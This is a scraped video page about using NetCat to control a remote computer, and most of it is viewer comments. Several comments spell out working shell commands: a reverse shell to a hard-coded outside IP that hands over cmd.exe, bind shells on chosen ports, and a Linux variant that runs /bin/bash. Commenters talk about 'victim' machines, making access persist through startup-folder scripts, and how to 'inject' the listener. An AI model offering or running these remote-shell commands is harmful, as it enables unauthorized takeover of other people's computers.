How to use NetCat to control a remote system

preview_player
Показать описание
How to use NetCat to control a remote system without installing any software and using a custom TCP-IP port.
Рекомендации по теме
Комментарии
Автор

Dont forget the more practical Reverse netcat!!! no need for the victim or client to forward ports or configure any firewalls... ( nc 66.66.66.66 88 -e cmd.exe -d )

-d is for demanize might be capital D, depending on version

onedayillpay
Автор

Thank you so much! Awesome! Liked, comment and subscribed. Just Great dude!

backinthedayy
Автор

Hi. If you run NetCat on the pc that you want to control with the -L option, you can connect how many times you want.

softgens
Автор

i speak spanish but i will try speak english so...
how can you sent a file with NC?
how you can sent a file with NC?.
Please Make A Video to understand

SSony
Автор

@softgens Do u mean I have to shut down firewall on my victim pc? because now i can't get access to it . telnet shows error

heavyduy
Автор

@heavydu4y ... in the video the PC is remote so it works .... I cannot understand your problem.

softgens
Автор

@heavydu4y Hi. It works. Try again and check the firewall. Bye

softgens
Автор

so baysically i have to have a phisical connection to the victime pc and add a bash file who has the listening command in it and put it in the starting folder and make anther bash file witch will have a loop in it trying to connect to the vic machine.
is there any way to inject it or somthing like that

SamyHacker
Автор

@softgens tried everything . Telnet is up on both computers, added -L, checked netstat -a, port 443 is listening, allow port and ip address in firewall, still nothing. Connection error

heavyduy
Автор

@draftpunkfreak
google environment variables or go to the directory that you have nc.exe in, in cmd so if my nc.exe is in my user folder I would type cd %userprofile% then nc will work.

byrd
Автор

@onedayillpay Thank you. Following your suggestion we should use on the controlled pc the command: nc -l -p 24444 -e cmd.exe -d -L

softgens
Автор

@softgens It does work with localhost but doesn't with remote PC

heavyduy
Автор

@softgens ok, it's the same telnet ip port or nc ip port. The both ways don't work

heavyduy
Автор

Because port 443 is already in use on a Windows system. Try a different port like 5678 or something

modiby
Автор

@softgens ok, I have 2 Windows XP, I type in cmd nc - l - p 443 -e C:\windows\system32\cmd.exe
on remote PC . On my PC in cmd i type nc PCadress 443. (or telnet PC adress 443) and getting connection error

heavyduy
Автор

@softgens It doesn't work with XP SP2 remote PC

heavyduy
Автор

@heavydu4y On my XP with firewall it works but on Windows you should add "-L". The antivirus could see nc as a virus ...

softgens
Автор

@heavydu4y No. I thought you was in a test environment. In real world usually the firewall is open from inside to outside at least on port 80 or 443.It should work.Bye

softgens
Автор

here is a example of reverse_tcp_netcat_shell... the victim will not need to farword ports if behind a router, hens (reverse tcp)

first the server... (keep in mind linux command is differnt then windows)

nc -l -p 666

nc bigmac.192.1 -p 666 -e /bin/bash

onedayillpay
Автор

Sorry but we have no data to try to help you

softgens
join shbcf.ru